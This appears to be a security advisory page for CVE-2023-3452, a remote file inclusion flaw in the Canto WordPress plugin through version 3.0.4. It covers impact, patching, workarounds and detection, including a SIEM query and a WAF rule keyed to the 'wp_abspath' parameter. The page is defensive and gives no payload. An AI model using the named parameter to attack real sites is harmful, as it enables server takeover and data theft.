Login Sign Up

CVE-2023-3452

9.8 CRITICAL
Remote Code Execution

📋 TL;DR

The Canto plugin for WordPress versions up to 3.0.4 contains a Remote File Inclusion vulnerability via the 'wp_abspath' parameter. This allows unauthenticated attackers to execute arbitrary code on the server if allow_url_include is enabled, potentially leading to complete system compromise. All WordPress sites using vulnerable Canto plugin versions are affected.

💻 Affected Systems

Products:
  • Canto WordPress Plugin
Versions: All versions up to and including 3.0.4
Operating Systems: Any OS running WordPress
Default Config Vulnerable: ⚠️ Yes
Notes: Remote exploitation requires allow_url_include to be enabled in PHP configuration, which is not default but sometimes enabled. Local File Inclusion requires ability to upload malicious PHP files to server.

📦 What is this software?

Canto by Canto

View all CVEs affecting Canto →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete server takeover with remote code execution, data exfiltration, backdoor installation, and lateral movement within the network.

🟠

Likely Case

Website defacement, data theft, malware distribution, or cryptocurrency mining due to the ease of unauthenticated exploitation.

🟢

If Mitigated

Limited impact if allow_url_include is disabled, though Local File Inclusion may still be possible with additional requirements.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation is straightforward with publicly available proof-of-concept code. Remote File Inclusion requires specific PHP configuration (allow_url_include enabled).

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.0.5 and later

Vendor Advisory: https://plugins.trac.wordpress.org/changeset/2951888/canto/trunk/includes/lib/tree.php

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find Canto plugin and update to version 3.0.5 or later. 4. Alternatively, download latest version from WordPress plugin repository and replace existing files.

🔧 Temporary Workarounds

Disable allow_url_include in PHP

all

Prevents remote file inclusion by disabling PHP's ability to include remote files via URL.

Edit php.ini: allow_url_include = Off
Or add to .htaccess: php_flag allow_url_include off

Disable or remove Canto plugin

linux

Immediately removes the vulnerable component while planning permanent fix.

wp plugin deactivate canto
wp plugin delete canto

🧯 If You Can't Patch

  • Implement web application firewall (WAF) rules to block requests containing 'wp_abspath' parameter
  • Restrict network access to affected systems and implement strict file upload controls

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin panel → Plugins → Canto version. If version is 3.0.4 or lower, system is vulnerable.

Check Version:

wp plugin list --name=canto --field=version

Verify Fix Applied:

Confirm Canto plugin version is 3.0.5 or higher in WordPress admin panel.

📡 Detection & Monitoring

Log Indicators:

  • HTTP requests containing 'wp_abspath' parameter
  • Unusual file inclusion attempts in web server logs
  • PHP error logs showing include() failures with remote URLs

Network Indicators:

  • Outbound connections from web server to unexpected external domains following web requests
  • Unusual HTTP POST requests to Canto plugin endpoints

SIEM Query:

source="web_server_logs" AND (uri="*wp_abspath*" OR uri="*/canto/*") AND (status=200 OR status=500)

📊 Metadata

CVE ID: CVE-2023-3452
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Published: August 12, 2023
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON